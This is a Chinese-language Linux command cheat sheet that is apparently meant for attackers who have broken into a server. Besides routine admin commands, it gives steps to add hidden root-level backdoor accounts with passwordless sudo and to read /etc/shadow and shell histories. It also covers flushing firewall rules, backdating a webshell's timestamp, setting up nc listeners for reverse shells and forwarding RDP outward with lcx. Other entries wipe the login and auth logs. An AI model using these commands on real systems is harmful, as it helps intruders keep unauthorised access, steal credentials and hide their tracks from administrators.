添加root权限用户

useradd -o -u 0 silic

非交互式修改密码

echo "mima123"|passwd –stdin usersilic
echo "usersilic:mima123" | chpasswd

压缩

#压缩
tar -zcvpf silic.tar.gz xxxx
#解压
tar -zxvpf silic.tar.gz xxxx

更改文件属性

#更改为0777
chmod 777 silic.php
更改所有者
chown -R apache:apache silic.php
更改用户组
chgrp -R apache silic.php

踢人

#查看在线用户
w
#踢人
skill -KILL -v pts/*

重启服务

service mysqld restart

清除iptable阻碍

iptables -L -n #查看本机情况
iptables -F #清除预设
iptables -X #清除自定义
service iptables restart #重启服务

生成htpasswd密码

htpasswd -nb silic passwd

开机启动相关

#查看启动服务
chkconfig
#追歼启动命令
/etc/rc.d/rc.local

使用yum快速安装

yum install nmap

读取配置

#用户列表和环境
cat /etc/passwd
#密文(root权限)
cat /etc/shadow
#系统版本
uname -a
lsb_release -a
cat /etc/issue
#环境变量
cat /proc/self/environ

历史记录

cat /root/.bash_history
cat /home/silic/.bash_history

rsync同步

#将远程服务器192.168.1.111的文件同步至本地
/usr/bin/rsync -avz [email protected]:/usr/local/nginx/conf/nginx.conf /tmp/conf.bak
#将本地服务器同步至远程服务器192.168.1.111
/usr/bin/rsync -avz  /tmp/silic.txt [email protected]:/home/work/postfixadmin/languages/br.php

修改文件时间戳

#转换标准时间到时间戳,UTC/GMT/CST:世界协调时间/格林威治标准时间/中国沿海时间
date -d "2011-11-11 11:11:11 UTC" +%s
#修改时间戳
touch -t yymmddhhmm
touch -t 201203042109.02 /home/www/webshell.php

查看进程列表

ps -ef

杀死进程

kill -s 9 XXXX_PID

查看硬盘使用情况

df -lh

路由追踪

#Linux
traceroute www.google.com
#Windows
tracert www.google.com

创建简单"隐藏"文件夹

mkdir /tmp/...

nc反弹端口监听

#windows
nc -vv -l -p 5555
#Linux
nc -l 5555

lcx转发端口

#本地监听3333端口并转发至4444端口
lcx -l 3333 4444
#将本地3389端口映射至远程
lcx.exe -s your-server-ip 3333 127.0.0.1 3389

日志清理

echo > /var/log/wtmp
echo > /var/log/btmp
echo > /var/log/lastlog
echo > /var/log/auth.log

统计文件夹大小

du -h /tmp

Linux读取NTF共享

showmount -e x.x.x.x
/usr/sbin/showmount
mount -t nfs x.x.x.x:/home/test /tmp/test

添加sudo用户

(添加一个uid为0的用户以后,更改这个uid为0的用户密码原root用户密码也会被更改,所以一般添加用户后为用户更改用户组,使用sudo执行命令)

usermod -a -G root backdooruser
usermod -a -G wheel backdooruser
usermod -a -G sudo backdooruser

赋予用户sudo权限

#允许用户backuser输入密码执行sudo
backuser	ALL=(ALL)	ALL
#允许用户组backuser里的用户输入密码执行sudo命令
%backuser	ALL=(ALL)	ALL
#允许用户backuser不输入密码执行sudo命令
backuser	ALL=(ALL)	NOPASSWD: ALL
#允许用户组backuser不输入密码执行sudo命令
%backuser	ALL=(ALL)	NOPASSWD: ALL